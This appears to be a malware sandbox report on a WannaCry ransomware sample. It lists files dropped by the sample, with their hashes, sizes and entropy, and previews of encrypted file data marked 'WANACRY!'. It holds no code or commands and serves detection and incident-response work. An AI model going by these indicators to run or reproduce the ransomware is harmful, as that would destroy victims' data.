                                                                                      Preview:WANACRY!....qB..e...R..=.b.0.J.8...n.4a...`.......q.{.P..^..o.....bx....'.W...]:Wf\.c[....HA...(e...3....6.F..z....EG..m...1.]..0............Q+..X..dK..eZ.T{5.Q....*RF..Tm....^..s......$.....x...p=f.G......c.u.,!.....E..U....2.6....b..F..+..._.e.>...b...>.R............*!.l.......S.C...#.w......R....M.&iY...k..qK.....x.R...e.N....K;D\..L\....._wG{.=.....4..1Jbc..Cny....'.{...|j.b..X.... _H...^.L...S[......>.......%.A..Q.ra..@.w..."Q..y@.).;.O.......*..v....(.[..f P...0`..&.5C.../.8.Jd(E.P.."...3.6...G...}.~A...3...v........F.kp.7j.Lr|G..A.#%.*..).v..\F.[....|e.....+..HP.q%..4W....2.g`!..Z.A..f..gy.e:..<...*S.ynO:NS.._R..+y1.x5..n.R..c)..!;lw...}66.....(/......!....KV..A....l...).x*..j.....d...._I.....N.&.'.&.V.;.OA......&./....;..x.jDa...q,4Bt.U|./G..>x^".......H..2r....~u..QA^.h70i#}q.|^?v7....J._......xG^...= .}..}t..;u.c}..........d...}..[....:-..h..ch.....P..]7..9).C..|........~}=,Sw...../........={2.......f.O..J...v...0.F.R7F.^....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1176
                                                                                      Entropy (8bit):7.822169366257438
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkAH0uHUROo+dMb8ABsFSwd1DpIdo1iiRnpFM/46hx2nGElZH34uorx8W+:bk60uHaOo+qb8AatF1ienPMQEEnJVIux
                                                                                      MD5:6DFA174ED8F35D858EF80EDD62FF8F48
                                                                                      SHA1:F05A5457F41E19F336506C6DEBE27AA1E3C8807A
                                                                                      SHA-256:CC04D37C0AFAB35C78C31CAFDE6744C1C9B632ABE06D44CD6187F1C26697CDAB
                                                                                      SHA-512:61E39B5C4F0B08F2756C6606E1D7320CA46E4A8D50249DE2993534490A55D694B43AC51324C48651366259C51E6EBAF094AE9E0F5F697ABE0F52EED9119A3C3A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......?....}...._?Z.:..7Ni_.$N...O@It..T........m...;.P.~........`.N...\.A...<2..z4.....T..T...-.p..B...7..9.U....E-.O<u..=.S.f0.$.i.G.....s..S..q..\......|....1{.z.h*.4(....7+..#d....2.!...U....|..i......U..8..Y.\O<Z.....%4...3.1..:.f...j..Y....z.......ea.ca'5.jI.lh,.E...~.@.....$..^6.3'.g...r...q.4C:`..p....d#....$.m..."...$...*....,!.I$..z.!.&..{..K...G...B..PLQN.kv.. ...2.>h.j.'.A<.t&...M............O.I.p.\yu..Q.C$f...=.@|.f".EI....u.......Mf.$.^F...G.[.V.........JI...zK]u.k*..*..tN..BP.h.j.....W.# U4&.....y...N.f..........C.b..m:m..N+$....[,J+..%9.m.4.\....b.E...@..rE..<.Y;.R..$L..tO.....}Ds*%..r..8....x<....XF.......).A.....}%..=...u..or.C.x...l..\....d.q.M...<..(Fr<b...aG...m;.;qL.t.*Ne<q.."...S*n.v.."/h..o+b{.Pr|.G.r$.U..a..D...3:1....&d;B?S..5..T..x..o.x..k......:.).~E..O.}..]:..M..ZL..5.I[....j......g'....|.*...4...".-/...-..\aT%...SX=.;. ....|..i.d.....7A.l.-%..;.W....Wt.~3..q,..`7.a../@.A.S.C...B}.[..c....*....R.i1AS..Q
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1176
                                                                                      Entropy (8bit):7.822169366257438
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkAH0uHUROo+dMb8ABsFSwd1DpIdo1iiRnpFM/46hx2nGElZH34uorx8W+:bk60uHaOo+qb8AatF1ienPMQEEnJVIux
                                                                                      MD5:6DFA174ED8F35D858EF80EDD62FF8F48
                                                                                      SHA1:F05A5457F41E19F336506C6DEBE27AA1E3C8807A
                                                                                      SHA-256:CC04D37C0AFAB35C78C31CAFDE6744C1C9B632ABE06D44CD6187F1C26697CDAB
                                                                                      SHA-512:61E39B5C4F0B08F2756C6606E1D7320CA46E4A8D50249DE2993534490A55D694B43AC51324C48651366259C51E6EBAF094AE9E0F5F697ABE0F52EED9119A3C3A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......?....}...._?Z.:..7Ni_.$N...O@It..T........m...;.P.~........`.N...\.A...<2..z4.....T..T...-.p..B...7..9.U....E-.O<u..=.S.f0.$.i.G.....s..S..q..\......|....1{.z.h*.4(....7+..#d....2.!...U....|..i......U..8..Y.\O<Z.....%4...3.1..:.f...j..Y....z.......ea.ca'5.jI.lh,.E...~.@.....$..^6.3'.g...r...q.4C:`..p....d#....$.m..."...$...*....,!.I$..z.!.&..{..K...G...B..PLQN.kv.. ...2.>h.j.'.A<.t&...M............O.I.p.\yu..Q.C$f...=.@|.f".EI....u.......Mf.$.^F...G.[.V.........JI...zK]u.k*..*..tN..BP.h.j.....W.# U4&.....y...N.f..........C.b..m:m..N+$....[,J+..%9.m.4.\....b.E...@..rE..<.Y;.R..$L..tO.....}Ds*%..r..8....x<....XF.......).A.....}%..=...u..or.C.x...l..\....d.q.M...<..(Fr<b...aG...m;.;qL.t.*Ne<q.."...S*n.v.."/h..o+b{.Pr|.G.r$.U..a..D...3:1....&d;B?S..5..T..x..o.x..k......:.).~E..O.}..]:..M..ZL..5.I[....j......g'....|.*...4...".-/...-..\aT%...SX=.;. ....|..i.d.....7A.l.-%..;.W....Wt.~3..q,..`7.a../@.A.S.C...B}.[..c....*....R.i1AS..Q
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1432
                                                                                      Entropy (8bit):7.863936401516215
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkb41IDbUV1q75fU0kD3R6Dxh2xvbRGuvaBr7Z/gxnFNzPYWA32IQdxXV:bkb41IDbUV1CU0MQDj2LG13IxnFtnASV
                                                                                      MD5:D06AB3A6E3EE159A759CA62D343477AE
                                                                                      SHA1:B0794F21A30A8E099630C72058CDB8FDFCCA6A11
                                                                                      SHA-256:9345CB596665E16FE6884E587884BFEEF868D3934DF5AD2524139922848086D7
                                                                                      SHA-512:A0B2BF4EFBE776F9529874BEE1C0450DA66F6E4AE65F99FB3EEFBA0B4312F2E3B3366F9B2C4535F6449DAE90F0590C2F2F1EB75A933E797697EB3676C3E9F4A5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....7iy.]P........A....l.....7...$......D-Hn,..0.5.C*...e..3.p.r.L..Tw.h..5e..o[......;Z3U..|..F.`.sc}..p>...a.T>......~.K....Z...E"...&.<..>I.7.....J...C.h7...?..~Er8...i....=.#.....A..&.+...W...F..B.5...?..V.T..S.t...\.'.n.(P...TGMh w.aF-a.'S..].....|........$..,7D....*...^...}...U,;X.G..a...A.!d..^V......Cb...i...._.2.>.<t....C...3I>..O.7...`...&..h.oT.Wj..!..e....B..E...e..C.&.....&...D!ZH{:-(...spN...b..w.v...RV)H....:x.........z..y.U..R...:.k-B....&.KZ.<x.....t.g4q'#...[.....O[...C....Y.*6..k`b.'.bW.I..lQ..!|...0...i..G....Q..*J..6Q.P...j4...-..+M.."aB..".4T3..[[..k..........2....I..v...!5@...}......ciP.me..u.....v\..@(.......L.^..~.q..J...g...A....9.f.A.oV...S....}........1.A._n. .\..In3.5..O...!.$...iCzu..6J.o..yCB3D..9%bs.~...x.....v.N.... f.2...BjG..(...C9.Y......;.....cg....-..\...C...... ._.T....r../Y.a....^.B....&..T.(.lnm..6... lK. ...[H./4:g...Bt.......8.&....L/.\F...m...a.y..F..#..a.0..-B.'C....__.e ....f.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1432
                                                                                      Entropy (8bit):7.863936401516215
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkb41IDbUV1q75fU0kD3R6Dxh2xvbRGuvaBr7Z/gxnFNzPYWA32IQdxXV:bkb41IDbUV1CU0MQDj2LG13IxnFtnASV
                                                                                      MD5:D06AB3A6E3EE159A759CA62D343477AE
                                                                                      SHA1:B0794F21A30A8E099630C72058CDB8FDFCCA6A11
                                                                                      SHA-256:9345CB596665E16FE6884E587884BFEEF868D3934DF5AD2524139922848086D7
                                                                                      SHA-512:A0B2BF4EFBE776F9529874BEE1C0450DA66F6E4AE65F99FB3EEFBA0B4312F2E3B3366F9B2C4535F6449DAE90F0590C2F2F1EB75A933E797697EB3676C3E9F4A5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....7iy.]P........A....l.....7...$......D-Hn,..0.5.C*...e..3.p.r.L..Tw.h..5e..o[......;Z3U..|..F.`.sc}..p>...a.T>......~.K....Z...E"...&.<..>I.7.....J...C.h7...?..~Er8...i....=.#.....A..&.+...W...F..B.5...?..V.T..S.t...\.'.n.(P...TGMh w.aF-a.'S..].....|........$..,7D....*...^...}...U,;X.G..a...A.!d..^V......Cb...i...._.2.>.<t....C...3I>..O.7...`...&..h.oT.Wj..!..e....B..E...e..C.&.....&...D!ZH{:-(...spN...b..w.v...RV)H....:x.........z..y.U..R...:.k-B....&.KZ.<x.....t.g4q'#...[.....O[...C....Y.*6..k`b.'.bW.I..lQ..!|...0...i..G....Q..*J..6Q.P...j4...-..+M.."aB..".4T3..[[..k..........2....I..v...!5@...}......ciP.me..u.....v\..@(.......L.^..~.q..J...g...A....9.f.A.oV...S....}........1.A._n. .\..In3.5..O...!.$...iCzu..6J.o..yCB3D..9%bs.~...x.....v.N.... f.2...BjG..(...C9.Y......;.....cg....-..\...C...... ._.T....r../Y.a....^.B....&..T.(.lnm..6... lK. ...[H./4:g...Bt.......8.&....L/.\F...m...a.y..F..#..a.0..-B.'C....__.e ....f.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1592
                                                                                      Entropy (8bit):7.8738649999608725
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkLUjhSr26nNzByxwd0kEqnPKXrV6Ibab:oLshSBS6P+rcIbab
                                                                                      MD5:8D2633D00DF1E4C8A37096AF904572F8
                                                                                      SHA1:168F5C7152C793E742251FBCDB838700722A84F8
                                                                                      SHA-256:07140E6B1E870E9BCFCAD623F9F67992CEDB1F1F6DE488B992B0BBC2ABB2BA27
                                                                                      SHA-512:B1F49414E3EB24D0A034BBEAD254D4A3580F67FA119460D1EA2D01E47BBED157046CE08E93011FBE3784170AEF68F04C82B6336DD29BA14C785556F0A146D2B5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....w...\.......2.W...@..{p...$i......B._I..I>.h.}....j.:W.E....N...j<qw..3....J.|.uc% ..,P.w....@i.n.....6...d|]..?Gt...*..}.1.~...e......(:.6......_.......t..(..IJ...n.-...H.=.$....b..b..JS...\.J.%..;.|.....P......i3L...N..'........!B..Rh..Wti.~.8............w.....!m.... .......?..y.@.>...p....(.Eo.)...:.-..I..0J.u.@....g.....B.<z.L=.!n.N.......BL.h..}....).G.....S..xCT...3..*...4. ~....gFX9......H.0.......oG...&..D...:..._.o!H.t.3h...Tm.T....WSc@.5..>../.....,..!oH..........N.u.W`ej.....nv...3<=0........*...lK......G@S....L..........&.k..)...D.S.. .L..=<^.z@.;u........z..%.._.....b.).Z.....?...6F7..iaW|.Z..i#....I..u.2.Vop..B.{r..K.6z;3...;^..F_.aL%L.m!L..kS...R.mO.V!sc#...6..Kaq.8%....-..f.r....;io....W...G..2.....#.....Hb;.o...U.v..9.iQ..9..KJ[.0.@..N@.k.o..v..@.....pki..G.....9Ur.].LU.n.....q;yx<.?th......J.zQ.".L...i....Df)...x....tE....>...)jBY.j-^."Z.b......!.Fr...._......T.._.<.....\...O_."a....../..Cu....9>p.=..J........K<xQ.J
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1592
                                                                                      Entropy (8bit):7.8738649999608725
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkLUjhSr26nNzByxwd0kEqnPKXrV6Ibab:oLshSBS6P+rcIbab
                                                                                      MD5:8D2633D00DF1E4C8A37096AF904572F8
                                                                                      SHA1:168F5C7152C793E742251FBCDB838700722A84F8
                                                                                      SHA-256:07140E6B1E870E9BCFCAD623F9F67992CEDB1F1F6DE488B992B0BBC2ABB2BA27
                                                                                      SHA-512:B1F49414E3EB24D0A034BBEAD254D4A3580F67FA119460D1EA2D01E47BBED157046CE08E93011FBE3784170AEF68F04C82B6336DD29BA14C785556F0A146D2B5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....w...\.......2.W...@..{p...$i......B._I..I>.h.}....j.:W.E....N...j<qw..3....J.|.uc% ..,P.w....@i.n.....6...d|]..?Gt...*..}.1.~...e......(:.6......_.......t..(..IJ...n.-...H.=.$....b..b..JS...\.J.%..;.|.....P......i3L...N..'........!B..Rh..Wti.~.8............w.....!m.... .......?..y.@.>...p....(.Eo.)...:.-..I..0J.u.@....g.....B.<z.L=.!n.N.......BL.h..}....).G.....S..xCT...3..*...4. ~....gFX9......H.0.......oG...&..D...:..._.o!H.t.3h...Tm.T....WSc@.5..>../.....,..!oH..........N.u.W`ej.....nv...3<=0........*...lK......G@S....L..........&.k..)...D.S.. .L..=<^.z@.;u........z..%.._.....b.).Z.....?...6F7..iaW|.Z..i#....I..u.2.Vop..B.{r..K.6z;3...;^..F_.aL%L.m!L..kS...R.mO.V!sc#...6..Kaq.8%....-..f.r....;io....W...G..2.....#.....Hb;.o...U.v..9.iQ..9..KJ[.0.@..N@.k.o..v..@.....pki..G.....9Ur.].LU.n.....q;yx<.?th......J.zQ.".L...i....Df)...x....tE....>...)jBY.j-^."Z.b......!.Fr...._......T.._.<.....\...O_."a....../..Cu....9>p.=..J........K<xQ.J
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1800
                                                                                      Entropy (8bit):7.899789157784822
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkH9PGHXpJQM2hScGNeV3TjqiBI0er0bXule1jwm2vrtPvJ2hN3q+ANvq9BMzGkI:bkHwHUM5N63KiDeqERvrtJ2h5nyqUfY3
                                                                                      MD5:F46A9DBDF7DA4D006D16239C0667927E
                                                                                      SHA1:B24C1CD84A0886FF02DD032E919A26367E115111
                                                                                      SHA-256:47BE1B07BF3E0C0C908728E1988B7195877F2F78EDE730D546B4A71157006766
                                                                                      SHA-512:33647E04DA926C069F9A9841A308C28AB03022A5E752422869E53B5F8DB92AD365299D228E7FA44457F56A1D60E5998F924C858D7484520B7288EACF3FF23E6B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........p.x7..i.swx.M.|QVa(...^..C.....*...m..u ~...F-.6.6..^.....nV;.X....A=uN...~..P.5.6.......\.3.P..{l.I.#x..P.`.,..7.......=.5......C.]......X...c..W#.y.[..H...W]6..i....a.7.4..P..,".(b~..e.I7...Y[7......y<.M......;<....;....:D..o.."..............t_3..g..3+Dp...lC...TT.N-...8i"Ju.p.W...W8...V:Krb"p..6C.f.KX..*;X....`..`..S.2.+.....9...$<.J<.G.).f........#Q.......G.h...!..-..nGC...O<j5.~ti}g..V.r.U..Se...S.P=\............4....|AgO8je.i.. n..a;.".qV...p(A:3.v..3......^..8.mK.RB.h.5.....T..W...*.,D..O.I@....y.>g..0..kg....|#.....\vUB~...%".+zC......a,|....)>.`....y.@P#NE.........t.... ..K.....$......W....U]m..A...Z.....Y......\S...E...Mt.i..B8.$..>.........<.0.V.r+`...6....t1B..Paqa.5.&8...s.1....o..?Z^...z.(.......@.w,.8.,.@....C..m...f{.YYm@0?.U?....x5..b........G..n..^........Lj....7|b..!..tQ..8...".......h...F.DxwO2-W.Y"...?.L*$.t$.....7.)IF1.{\...I.L...v;aR...Jc[...Q.......|.r...wUX.h..?.n.e.....K.....Ouo;..!.A
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1800
                                                                                      Entropy (8bit):7.899789157784822
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkH9PGHXpJQM2hScGNeV3TjqiBI0er0bXule1jwm2vrtPvJ2hN3q+ANvq9BMzGkI:bkHwHUM5N63KiDeqERvrtJ2h5nyqUfY3
                                                                                      MD5:F46A9DBDF7DA4D006D16239C0667927E
                                                                                      SHA1:B24C1CD84A0886FF02DD032E919A26367E115111
                                                                                      SHA-256:47BE1B07BF3E0C0C908728E1988B7195877F2F78EDE730D546B4A71157006766
                                                                                      SHA-512:33647E04DA926C069F9A9841A308C28AB03022A5E752422869E53B5F8DB92AD365299D228E7FA44457F56A1D60E5998F924C858D7484520B7288EACF3FF23E6B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........p.x7..i.swx.M.|QVa(...^..C.....*...m..u ~...F-.6.6..^.....nV;.X....A=uN...~..P.5.6.......\.3.P..{l.I.#x..P.`.,..7.......=.5......C.]......X...c..W#.y.[..H...W]6..i....a.7.4..P..,".(b~..e.I7...Y[7......y<.M......;<....;....:D..o.."..............t_3..g..3+Dp...lC...TT.N-...8i"Ju.p.W...W8...V:Krb"p..6C.f.KX..*;X....`..`..S.2.+.....9...$<.J<.G.).f........#Q.......G.h...!..-..nGC...O<j5.~ti}g..V.r.U..Se...S.P=\............4....|AgO8je.i.. n..a;.".qV...p(A:3.v..3......^..8.mK.RB.h.5.....T..W...*.,D..O.I@....y.>g..0..kg....|#.....\vUB~...%".+zC......a,|....)>.`....y.@P#NE.........t.... ..K.....$......W....U]m..A...Z.....Y......\S...E...Mt.i..B8.$..>.........<.0.V.r+`...6....t1B..Paqa.5.&8...s.1....o..?Z^...z.(.......@.w,.8.,.@....C..m...f{.YYm@0?.U?....x5..b........G..n..^........Lj....7|b..!..tQ..8...".......h...F.DxwO2-W.Y"...?.L*$.t$.....7.)IF1.{\...I.L...v;aR...Jc[...Q.......|.r...wUX.h..?.n.e.....K.....Ouo;..!.A
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2296
                                                                                      Entropy (8bit):7.919500577500503
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkea3DquI7DNoALgkEGoaozmL/tnzh3IK9T+Ep/cEB66rnffosDskp23T7jCF:opDquaRLgfGoUv9iEaWXffosDs73Dw
                                                                                      MD5:ACEFA0018290428E4E6FD9FD480105FC
                                                                                      SHA1:016351E842298CE26401AE1BC650911B9B1A88C0
                                                                                      SHA-256:16530B0A79113ABA63C61AAA6B3EC3DA8E8500D6EA52239894D93FBBB260F10F
                                                                                      SHA-512:5D34258413E0669183B0506212FABC0A6608C23A925A8FBDA586EA4295DEB35BE57953E2700E5B9760DB05981DDC415FDC1B3D1C44064D331147059A915EAD54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....sI).E..?..U....8....g...kRa' ...xRi..b... .i.v...wF../..z6.SV..vm>.~.q7...Q...^V..X.f..}|FZ[M..PK&...)=.......w.\..>.]..1...a......_..u.I#....B.#.Z..!..y..Y..N2.i9.....N8...`x..Z.J...W.e....i3.Y.Z~......P.Q...^...C.........{....S..:3$.fK<..DN.H..]...............P..b........G..Y..%...z`.*.....q.Y....AL.../Qh.......e.....^~....o..@.Y....m.enO?@.^.a.....ge..:.....o.f...{f.c....}.&..n:...'...z..'.......k./T-.]....hbYG8:..d.D..p.U....=+..C.x..q....u`..6XF.w<f9.h....x..`.8...g.E.,.mp........i..C].9e..(>U9Xl .3`..q..b.x..@[.m.2....-..t...{.5._..-.(.5.....|,.1..J..6).T.pI>.w..l.L.G.fd&R}..k$..7.........*.al]h..s.R....<.%6@i|.s..Vr..........2.\0....1...).R#......w...q.P...Z...Z3.".R1...'...........*.r.*.a..K.'.<.5.......;..3...y.[..."l....1.W...I....)w.....A.?...%,.nU.Z...L.p.-.#..F.7.L.b..Z....]..qprZ.YN.qL...|Q...X...0.F....+...\.)=..B.@...rOh..0..(.....#Ib....j.L.....Tf...UC..R....X#..C,.S..............X...<k.c..........U..a\c
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2296
                                                                                      Entropy (8bit):7.919500577500503
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkea3DquI7DNoALgkEGoaozmL/tnzh3IK9T+Ep/cEB66rnffosDskp23T7jCF:opDquaRLgfGoUv9iEaWXffosDs73Dw
                                                                                      MD5:ACEFA0018290428E4E6FD9FD480105FC
                                                                                      SHA1:016351E842298CE26401AE1BC650911B9B1A88C0
                                                                                      SHA-256:16530B0A79113ABA63C61AAA6B3EC3DA8E8500D6EA52239894D93FBBB260F10F
                                                                                      SHA-512:5D34258413E0669183B0506212FABC0A6608C23A925A8FBDA586EA4295DEB35BE57953E2700E5B9760DB05981DDC415FDC1B3D1C44064D331147059A915EAD54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....sI).E..?..U....8....g...kRa' ...xRi..b... .i.v...wF../..z6.SV..vm>.~.q7...Q...^V..X.f..}|FZ[M..PK&...)=.......w.\..>.]..1...a......_..u.I#....B.#.Z..!..y..Y..N2.i9.....N8...`x..Z.J...W.e....i3.Y.Z~......P.Q...^...C.........{....S..:3$.fK<..DN.H..]...............P..b........G..Y..%...z`.*.....q.Y....AL.../Qh.......e.....^~....o..@.Y....m.enO?@.^.a.....ge..:.....o.f...{f.c....}.&..n:...'...z..'.......k./T-.]....hbYG8:..d.D..p.U....=+..C.x..q....u`..6XF.w<f9.h....x..`.8...g.E.,.mp........i..C].9e..(>U9Xl .3`..q..b.x..@[.m.2....-..t...{.5._..-.(.5.....|,.1..J..6).T.pI>.w..l.L.G.fd&R}..k$..7.........*.al]h..s.R....<.%6@i|.s..Vr..........2.\0....1...).R#......w...q.P...Z...Z3.".R1...'...........*.r.*.a..K.'.<.5.......;..3...y.[..."l....1.W...I....)w.....A.?...%,.nU.Z...L.p.-.#..F.7.L.b..Z....]..qprZ.YN.qL...|Q...X...0.F....+...\.)=..B.@...rOh..0..(.....#Ib....j.L.....Tf...UC..R....X#..C,.S..............X...<k.c..........U..a\c
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1528
                                                                                      Entropy (8bit):7.8662775263531675
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkypl82jxc/K8Qr8o2032hnfMNfj1mZtnolgrcMfZ3hQbIEeDVwi4gqREtEAloLI:bkI8IxgQriBMNfctOgr9ZBVwUt9oPAyW
                                                                                      MD5:229B644E6A740B3EABFEA687A671E4F4
                                                                                      SHA1:E2995811F9537234C1AF8DB9B5752BE49480F7FB
                                                                                      SHA-256:A018380206D77F23DD88C9FEBF36795C923B46007B42358A524D41DF40D1AA03
                                                                                      SHA-512:F391F340C9BA541A9567B8761350ADBA131BD6D3463A1B96AF4A9034F9BEAC943A367829BC8AEAF88AC6E900F2B9564E868BF083B835C51EE7E062C6D09088A9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....1.=.....(+..E...9..}....F....p...9.b..4...C.........\ih...-.)C.!.Gt3.......#..:...I%R..|..*...i....i,...h.._TOcW....e...x.6.....a.d.a....l..."*.1.[..+.~.)..[....@..C...m.~;....C.....8$gN...X.<.....Yh-%ta.....d;......U=.......\y.....<s......z..x.............Q.,....^U...s..7.R..MJ@..ZK........p4Dp...i.c%..:..,.,.....r?...|.l.0H.#z"2J.T=..N.kx....s.aL......v......hzB......<...V1..lN.....N.b..I...w.Yw...@....U........M...e.U.....b....:n..AS...l......).@.P.....Z#...Gg.....wI.m.b.0...$...J17...Wf/...^.[6.......o.>....m.o._D...........yt..pI......{H..h...;.b..-qc...5.........@.._G.i.:....y.."...04i......\..~j.!bw ..Q...o...[B.*.u..?..`.\....(:.MkI|.kC.M...W....+....6_6 J......k....Y..A. d.A[....W..QX{......D....iT.....=8.V.0*PL....._=.V...<..y..J&%...0..#(......k..%..C......".to.XY_.5,D:.Q...%S...,uL.../..y...H...U..vg@8..X_J;.......U.y.KeL..."....E..7?$.Ua......3;..y.e.$Eq.pi.gv=.U.J\i.B.i.......%P..:.`..t,2y....B.........aC
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1528
                                                                                      Entropy (8bit):7.8662775263531675
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkypl82jxc/K8Qr8o2032hnfMNfj1mZtnolgrcMfZ3hQbIEeDVwi4gqREtEAloLI:bkI8IxgQriBMNfctOgr9ZBVwUt9oPAyW
                                                                                      MD5:229B644E6A740B3EABFEA687A671E4F4
                                                                                      SHA1:E2995811F9537234C1AF8DB9B5752BE49480F7FB
                                                                                      SHA-256:A018380206D77F23DD88C9FEBF36795C923B46007B42358A524D41DF40D1AA03
                                                                                      SHA-512:F391F340C9BA541A9567B8761350ADBA131BD6D3463A1B96AF4A9034F9BEAC943A367829BC8AEAF88AC6E900F2B9564E868BF083B835C51EE7E062C6D09088A9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....1.=.....(+..E...9..}....F....p...9.b..4...C.........\ih...-.)C.!.Gt3.......#..:...I%R..|..*...i....i,...h.._TOcW....e...x.6.....a.d.a....l..."*.1.[..+.~.)..[....@..C...m.~;....C.....8$gN...X.<.....Yh-%ta.....d;......U=.......\y.....<s......z..x.............Q.,....^U...s..7.R..MJ@..ZK........p4Dp...i.c%..:..,.,.....r?...|.l.0H.#z"2J.T=..N.kx....s.aL......v......hzB......<...V1..lN.....N.b..I...w.Yw...@....U........M...e.U.....b....:n..AS...l......).@.P.....Z#...Gg.....wI.m.b.0...$...J17...Wf/...^.[6.......o.>....m.o._D...........yt..pI......{H..h...;.b..-qc...5.........@.._G.i.:....y.."...04i......\..~j.!bw ..Q...o...[B.*.u..?..`.\....(:.MkI|.kC.M...W....+....6_6 J......k....Y..A. d.A[....W..QX{......D....iT.....=8.V.0*PL....._=.V...<..y..J&%...0..#(......k..%..C......".to.XY_.5,D:.Q...%S...,uL.../..y...H...U..vg@8..X_J;.......U.y.KeL..."....E..7?$.Ua......3;..y.e.$Eq.pi.gv=.U.J\i.B.i.......%P..:.`..t,2y....B.........aC
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4856
                                                                                      Entropy (8bit):7.963046409804243
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oJRGChJ66v5LxBTd3Sd5I6LS8UHWiMe/LqUK/5+7q2qVn6ybeMPZ+pqkNmm:3CuULY7LSVHfN/LqUKoulV6ydSPV
                                                                                      MD5:D246CEFA0C737B8BA9C2DB8C0210E0B2
                                                                                      SHA1:21D06A67445B915A4938AA122A6B93D1CEE142A4
                                                                                      SHA-256:AA26D43AB059BF1ABC2C81879DC48083E1113B9A34FB355029350584DFA93C71
                                                                                      SHA-512:F7000F1F3FCD6969DADDE90B88662B8C34B9909AF1BF4B93E5C95F7983379530BFCC34CA9A0B431CAE2802702FF58CA3AA34691AF64474A3FD0B97CB699ECA50
                                                                                      Malicious:false
                                                                                      Reputation:low
